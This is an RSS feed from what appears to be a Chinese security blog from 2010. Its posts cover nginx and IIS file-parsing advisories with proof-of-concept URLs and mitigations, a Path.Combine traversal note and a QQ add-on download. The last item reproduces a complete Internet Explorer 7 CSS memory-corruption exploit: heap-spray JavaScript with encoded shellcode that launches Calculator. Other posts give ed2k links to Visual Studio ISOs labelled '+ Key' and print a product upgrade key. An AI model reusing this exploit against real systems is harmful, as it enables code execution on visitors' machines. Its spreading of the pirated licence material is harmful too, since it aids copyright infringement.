<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[Bin-Blog]]></title>
<link>http://www.rootkit.net.cn/</link>
<description><![CDATA[低调。。。。。。]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog2 v2.4]]></copyright>
<webMaster><![CDATA[master@rootkit.net.cn(Bin)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>Bin-Blog</title> 
	<url>http://www.rootkit.net.cn/images/logos.gif</url> 
	<link>http://www.rootkit.net.cn/</link> 
	<description>Bin-Blog</description> 
</image>

			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=150</link>
			<title><![CDATA[KillQQAd V1.0.0.48 For QQ2010正式版]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Mon,28 Jun 2010 02:03:55 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=150</guid>	
		<description><![CDATA[&nbsp;&nbsp;KillQQAd V1.0.0.45<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;* 增加了本地缓存功能，获取好友IP信息后，重启QQ也不会丢失<br/>&nbsp;&nbsp;&nbsp;&nbsp;* IP窗口宽度自适应IP信息长度，不会出现显示不全的问题<br/>&nbsp;&nbsp;&nbsp;&nbsp;* IP窗口全透明，不会出现QQ聊天窗口背景被遮挡的问题<br/>&nbsp;&nbsp;&nbsp;&nbsp;* 修复了一个可能导致内存泄露的笔误<br/>&nbsp;&nbsp;&nbsp;&nbsp;* 针对&#34;腾讯QQ 2010 正式版(1720)&#34;制作，其他版本并不适用 <br/><br/><br/><img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="https://dl.dro&#112;box.com/u/2067867/KillQQAd%201.0.0.48.zip" target="_blank">KillQQAd V1.0.0.48</a>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=148</link>
			<title><![CDATA[MSDN VS2010 Ultimate 简体中文正式版]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[我的文档]]></category>
			<pubDate>Wed,02 Jun 2010 23:00:51 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=148</guid>	
		<description><![CDATA[MSDN VS2010 Ultimate 简体中文正式版<br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-1.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-2.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-3.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-4.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-5.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-6.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-7.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-8.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-9.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-10.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-11.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-12.png" border="0" alt=""/><br/><br/><img src="http://www.rootkit.net.cn/pic/vs2010-13.png" border="0" alt=""/><br/><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|cn_visual_studio_2010_professional_x86_dvd_532145.iso|2591844352|6001253431AFE573E4344F5A0B1D9CAC| /">MSDN Professional + Key(简体中文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|cn_visual_studio_2010_ultimate_x86_dvd_532347.iso|2685982720|4AE6228933DDE49D9BFA4C3467C831C2|/">MSDN Ultimate + Key(简体中文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|cn_visual_studio_team_foundation_server_2010_x86_x64_dvd_531909.iso|1963589632|C9C77B2707DF100621B3FB653C285524|/">MSDN Team Foundation Server + Key(简体中文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|ct_visual_studio_team_foundation_server_2010_x86_x64_dvd_531915.iso|1966714880|D6BD12D5B693E7EDA545D52FB54CC8E5|/">MSDN Team Foundation Server + Key(繁體中文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|ct_visual_studio_2010_ultimate_x86_dvd_532348.iso|2691330048|BF50926EAB061C7D0D92580F4132F9EA|/">MSDN Ultimate + Key(繁體中文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|en_visual_studio_2010_professional_x86_dvd_509727.iso|2351316992|D395B6381AC129209EE80D9BED4BA5F1|/">MSDN Professional + Key(英文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|en_visual_studio_2010_ultimate_x86_dvd_509116.iso|2446950400|0694CFA0756D8C11499DE5B42E205410|/">MSDN Ultimate + Key(英文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|en_visual_studio_2010_premium_x86_dvd_509357.iso|2439485440|C72F6195CAC0932AA5B6861AE863FDBC|/">MSDN Premium + Key(英文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|en_visual_studio_2010_express_x86_dvd_510419.iso|727351296|1D2EE178370FBD55E925045F3A435DCC|/">MSDN Express + Key(英文版本)</a><br/><br/><img border="" src="http://www.rootkit.net.cn/images/ed2k.gif" alt=""/><a target="_blank" href="http://www.rootkit.net.cn/ed2k://|file|en_visual_studio_team_foundation_server_2010_x86_x64_dvd_509406.iso|1723766784|70DC63F8B39D09C2B0BAE63DFB0673C9|/">MSDN Team Foundation Server + Key(英文版本)</a><br/><br/><br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=147</link>
			<title><![CDATA[IIS源码泄露及文件类型解析错误]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Fri,21 May 2010 17:39:41 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=147</guid>	
		<description><![CDATA[漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP的IIS服务器，特别是虚拟主机用户可能受的影响较大。<br/><br/><br/>漏洞分析：<br/>IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。<br/><br/>黑盒访问<br/><br/><a href="http://www.80sec.com/robots.txt/1.php" target="_blank">http://www.80sec.com/robots.txt/1.php</a><br/><br/><br/>查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。<br/><br/>同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码<br/><br/><a href="http://www.80sec.com/some.asp/1.php" target="_blank">http://www.80sec.com/some.asp/1.php</a><br/><br/>漏洞厂商：<a href="http://www.microsoft.com" target="_blank">http://www.microsoft.com</a><br/><br/>解决方案：<br/><br/>我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失<br/><br/>关闭cgi.fix_pathinfo为0]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=146</link>
			<title><![CDATA[nginx文件类型错误解析漏洞]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Fri,21 May 2010 17:38:28 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=146</guid>	
		<description><![CDATA[<br/><br/>漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。<br/><br/><br/>漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以<br/><br/><br/>location ~ \.php$ {<br/>root html;<br/>fastcgi_pass 127.0.0.1:9000;<br/>fastcgi_index index.php;<br/>fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;<br/>include fastcgi_params;<br/>}<br/><br/>的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。<br/>那么假设存在一个<a href="http://www.80sec.com/80sec.jpg" target="_blank">http://www.80sec.com/80sec.jpg</a>，我们以如下的方式去访问<br/><br/><a href="http://www.80sec.com/80sec.jpg/80sec.php" target="_blank">http://www.80sec.com/80sec.jpg/80sec.php</a><br/><br/><br/>将会得到一个URI<br/><br/>/80sec.jpg/80sec.php<br/><br/>经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为<br/><br/>/scripts/80sec.jpg/80sec.php<br/><br/>而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为<br/><br/>/scripts/80sec.jpg<br/><br/>所以不存在此问题。<br/>后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为<br/><br/>/scripts/80sec.jpg和80sec.php<br/><br/>最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。<br/><br/>POC： 访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：<br/><br/>访问<a href="http://www.80sec.com/robots.txt" target="_blank">http://www.80sec.com/robots.txt</a><br/><br/>HTTP/1.1 200 OK<br/>Server: nginx/0.6.32<br/>Date: Thu, 20 May 2010 10:05:30 GMT<br/>Content-Type: text/plain<br/>Content-Length: 18<br/>Last-Modified: Thu, 20 May 2010 06:26:34 GMT<br/>Connection: keep-alive<br/>Keep-Alive: timeout=20<br/>Accept-Ranges: bytes<br/><br/>访问访问<a href="http://www.80sec.com/robots.txt" target="_blank">http://www.80sec.com/robots.txt</a>/80sec.php<br/><br/>HTTP/1.1 200 OK<br/>Server: nginx/0.6.32<br/>Date: Thu, 20 May 2010 10:06:49 GMT<br/>Content-Type: text/html<br/>Transfer-Encoding: chunked<br/>Connection: keep-alive<br/>Keep-Alive: timeout=20<br/>X-Powered-By: PHP/5.2.6<br/><br/>其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。<br/><br/>漏洞厂商：<a href="http://www.nginx.org" target="_blank">http://www.nginx.org</a><br/><br/>解决方案：<br/><br/>我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失<br/><br/>关闭cgi.fix_pathinfo为0<br/><br/>或者<br/><br/>if ( $fastcgi_script_name ~ \..*\/.*php ) {<br/>return 403;<br/>}<br/><br/>PS: 鸣谢laruence大牛在分析过程中给的帮助<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=145</link>
			<title><![CDATA[IIS7运行WCF服务出现404错误的解决方法]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[学习笔记]]></category>
			<pubDate>Wed,28 Apr 2010 20:02:59 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=145</guid>	
		<description><![CDATA[错误页面如下，出现这个问题，很大的可能是在iis中没有正确的配置WCF服务，解决的办法也很简单<br/>使用 %Windows%\Microsoft.Net\Framework\v3.0\Windows Communication Foundation目录下的ServiceModelReg.exe程序就好了<br/><br/>首先检测服务状态：<br/>命令: ServiceModelReg -vi<br/>结果: 如果协议都是“未安装”状态 则可以确定是WCF在IIS中没有正确安装<br/><br/>接着安装服务：<br/>命令: ServiceModelReg -i<br/>结果: 如果成功安装，会返回成功信息<br/><br/>重启IIS，解决！]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=144</link>
			<title><![CDATA[Visual Studio 2010专业、高级、旗舰三种版本的正式版（下载）]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Wed,14 Apr 2010 21:03:01 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=144</guid>	
		<description><![CDATA[Visual Studio是微软公司推出的目前最为流行的Windows平台应用程序开发环境。从Visual Studio的第一个版本开始，微软就将提高开发人员的工作效率和灵活性作为研发目标。使用具有更多新特性的最新版本Visual Studio 2010，即可非常有效地在新一代应用平台上为客户创造令人惊奇的解决方案。现提供Visual Studio 2010专业、高级、旗舰三个版本的简要介绍、官方下载，以及旗舰版升级密钥如下&mdash;&mdash;<br /><br />&nbsp;&nbsp;&nbsp; Visual Studio 2010具有五大特性：支持云计算架构；Agile/Scrum开发方法；兼容Windows 7与Silverlight 4；发挥多核并行运算威力；能够更好地支持C++。<br /><br /><br />(一)专业版<br /><br />&nbsp;&nbsp;&nbsp; 面向个人开发人员提供集成开发环境、开发平台支持以及测试工具等。其中带有MSDN Essential(有效期一年的MSDN订阅)的完整版售价799美元、升级版售价549美元；带有MSDN订阅的完整版售价1199美元、升级版售价 799美元。<br /><br />&nbsp;&nbsp;&nbsp; 微软官方下载地址：<font size="3" face="宋体" color="#f1c232"><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=5414e4c0-c1f8-473e-8e9d-a1a7be786141&amp;displaylang=en" target="_blank">Microsoft  Visual Studio 2010 Professional - ISO</a></font><br /><br />(二)高级版<br /><br />&nbsp;&nbsp;&nbsp; 创建可扩展、高质量程序的完整工具包，相比专业版增加了数据库开发、Team Foundation Server(TFS)、调试与诊断、程序生命周期管理(ALM)。完整版售价5469美元，升级版售价2299美元。<br /><br />&nbsp;&nbsp;&nbsp; 微软官方下载地址：<font size="3" face="宋体" color="#f1c232"><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=f81412a2-d48e-4040-9b32-27eaf771c5db&amp;displaylang=en" target="_blank">Microsoft  Visual Studio 2010 Premium - ISO</a></font><br /><br />(三)旗舰版<br /><br />&nbsp;&nbsp;&nbsp; 面向开发团队的综合性ALM工具，相比高级版增加了架构与建模、实验室管理等。完整版售价11899美元，升级版售价3799美元。<br /><br />&nbsp;&nbsp;&nbsp; 微软官方下载地址：<font size="3" face="宋体" color="#f1c232"><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=06a32b1c-80e9-41df-ba0c-79d56cb823f7&amp;displaylang=en" target="_blank">Microsoft  Visual Studio 2010 Ultimate - ISO</a></font><br /><br />&nbsp;&nbsp;&nbsp; 安装完毕后，在卸载程序中进入维护模式，用YCFHQ-9DWCY-DKV88-T2TMH-G7BHP升级即可。<br /><br />附一：Microsoft .NET Framework 4(Web Installer) <font size="3" face="宋体" color="#f1c232"><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9cfb2d51-5ff4-4491-b0e5-b386f32c0992&amp;displaylang=en" target="_blank">微 软官方下载地址</a></font><br /><br />&nbsp;&nbsp;&nbsp; 提供了对更多业界标准、语言选项的支持。新增支持包括并行编程在内的高性能中间层应用。Microsoft .NET Framework 4可与Microsoft .NET Framework 3.5并存。<br /><br />附二：Microsoft Visual C++ 2010 Redistributable Package <font size="3" face="宋体" color="#f1c232"><font color="#f1c232"><a href="http://www.microsoft.com/downloads/details.aspx?displaylang=en&amp;FamilyID=a7b7a05e-6de6-4d3a-a423-37bf0912db84" target="_blank">微 软官方下载地址</a></font></font><br /><br />&nbsp;&nbsp;&nbsp; 本程序包为C运行时库(CRT)、标准C++、ATL、MFC、OpenMP和MSDIA库安装运行时组件。对于支持并行部署模型的库(CRT、SCL、 ATL、MFC、OpenMP)，这些运行时组件被安装到：支持并行程序集的Windows操作系统的本机程序集缓存(也称为 WinSxS文件夹)中。]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=143</link>
			<title><![CDATA[Path.Combine() 方法]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[学习笔记]]></category>
			<pubDate>Thu,18 Mar 2010 20:22:43 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=143</guid>	
		<description><![CDATA[string path1 = @&#34;F:\WEB\aspx\&#34;;<br/>string path2 = @&#34;c:\&#34;;<br/>string path = Path.Combine(path1,path2);<br/><br/>参数<br/>path1<br/>第一个路径。<br/><br/>path2<br/>第二个路径。<br/><br/>返回值<br/>包含合并的路径的字符串。如果指定的路径之一是零长度字符串，则该方法返回其他路径。如果 path2 包含绝对路径，则该方法返回 path2。 <br/><br/>输出path为 c:\ <br/><br/>如果path2可以动态赋值的话，可导致遍历任意路径的BUG。例如FCKeditor 的.NET版。<br/> ]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=142</link>
			<title><![CDATA[我的服务器]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[淫声如梦]]></category>
			<pubDate>Wed,13 Jan 2010 01:17:13 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=142</guid>	
		<description><![CDATA[&nbsp;&nbsp;服务器换了好几个地方了，现在的这个时间是比较久的，感谢朋友的大力支持，当然也少不了大小国际黑客的拜访，能拿到权限的我佩服的五体投地，还有些蛋疼的兄台在那D来D去，有这时间还不如学学人家&#34;Iranian Cyber Army&#34;。发两个图片娱乐下。<br/><br/>我的服务器上还有一个朋友的私服网站。看看里面有多少SHELL。去年10月之前我删除过一批<br/><img src="http://www.rootkit.net.cn/pic/hh.jpg" border="0" alt=""/><br/><br/>最近服务器一直被CC，不知道哪位闲的蛋疼的哥们，我看你到底能疼多久。<br/><br/><img src="http://www.rootkit.net.cn/pic/hh1.jpg" border="0" alt=""/>]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=141</link>
			<title><![CDATA[诺基亚N93摄像头黑屏的救星]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[淫声如梦]]></category>
			<pubDate>Mon,28 Dec 2009 00:05:15 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=141</guid>	
		<description><![CDATA[&nbsp;&nbsp;说起我的N93还是很有纪念意义的，刚工作的时候用两个月的工钱买的，那个破卡尔蔡司摄像头惹出了不少麻烦，被哥们掰来掰去掰黑屏了，在网上一顿狂搜，那些什么&#34;去客服啊&#34;，“格机啊”，”换件啊“，“放水里啊”，&#34;放火里啊&#34;，让人哭笑不得。终于在塞班找到了一位牛淫哥哥的答案。<br/><br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.rootkit.net.cn/images/quote.gif" style="margin:0px 2px -3px 0px" alt="引用内容"/> 引用内容</div><div class="UBBContent"><br/>我的小I在拍照的时候出现了很多条红白条纹,如果出现以下这个情况,有2种解决方案:<br/><br/>1.在照相和摄像来回的切换，稍微切换个4次至5次,我最多一次好像切换了10次左右 果然好了 .所以如果有的朋友和我的一样 不妨也试试能不能修好~!<br/><br/>2.就是小I在旋转屏幕照相的时候将屏幕旋转到底,然后看看你的屏幕,是不是黑屏就不存在了?<br/></div></div><br/>虽然他的是N93I，但是按照方法1测试成功，膜拜！<br/><br/>这位大哥如果要是搞安全的，估计能挖出来N多0day!]]></description>
		</item>
		
			<item>
			<link>http://www.rootkit.net.cn/default.asp?id=138</link>
			<title><![CDATA[南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞]]></title>
			<author>master@rootkit.net.cn(Bin)</author>
			<category><![CDATA[经典收藏]]></category>
			<pubDate>Sun,22 Nov 2009 21:12:46 +0800</pubDate>
			<guid>http://www.rootkit.net.cn/default.asp?id=138</guid>	
		<description><![CDATA[1．漏洞介绍<br/>在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。<br/> <br/>2．漏洞危害(危害等级高)<br/>黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。<br/> <br/>3．通知途径<br/>已经向“国家漏洞库”提交。<br/> <br/>4．<img src="http://www.rootkit.net.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.yxlink.com/download/%5BYV20090432%5DIE7vul.doc" target="_blank">详细文档下载</a><br/>POC:<br/> <br/>更多安全漏洞公布，请关注www.yxlink.com 铱迅安全论坛:bbs.yxlink.com<br/> <br/> <br/>&lt;!--<br/>请将以下内容粘贴到html文件中,利用成功后，会启动windows计算器程序<br/>南京铱迅信息技术有限公司（Nanjing Yxlink Information Technologies Co.,Ltd.）<br/><a href="http://www.yxlink.com" target="_blank">http://www.yxlink.com</a><br/>--&gt;<br/>&lt;!DOCTYPE HTML PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;<a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" target="_blank">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd</a>&#34;&gt;<br/>&lt;HTML xmlns=&#34;<a href="http://www.w3.org/1999/xhtml" target="_blank">http://www.w3.org/1999/xhtml</a>&#34;&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;HEAD&gt;<br/>&lt;script&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function load(){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var e;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e=document.getElementsByTagName(&#34;STYLE&#34;)[0];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.outerHTML=&#34;1&#34;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;STYLE type=&#34;text/css&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body{ overflow: scroll; margin: 0; }<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/style&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;SCRIPT language=&#34;javascript&#34;&gt;<br/>var shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/>var bigblock = unescape(&#34;%u9090%u9090&#34;);<br/>var headersize = 20;<br/>var slackspace = headersize+shellcode.length;<br/>while (bigblock.length&lt;slackspace) bigblock+=bigblock;<br/>fillblock = bigblock.substring(0, slackspace);<br/>block = bigblock.substring(0, bigblock.length-slackspace);<br/>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;<br/>memory = new Array();<br/>for (x=0; x&lt;4000; x++) memory[x] = block + shellcode;<br/>&lt;/script&gt;<br/> <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/HEAD&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BODY onload=&#34;load()&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/BODY&gt;<br/>&lt;/HTML&gt;<br/>//yxlink.com<br/>]]></description>
		</item>
		
</channel>
</rss>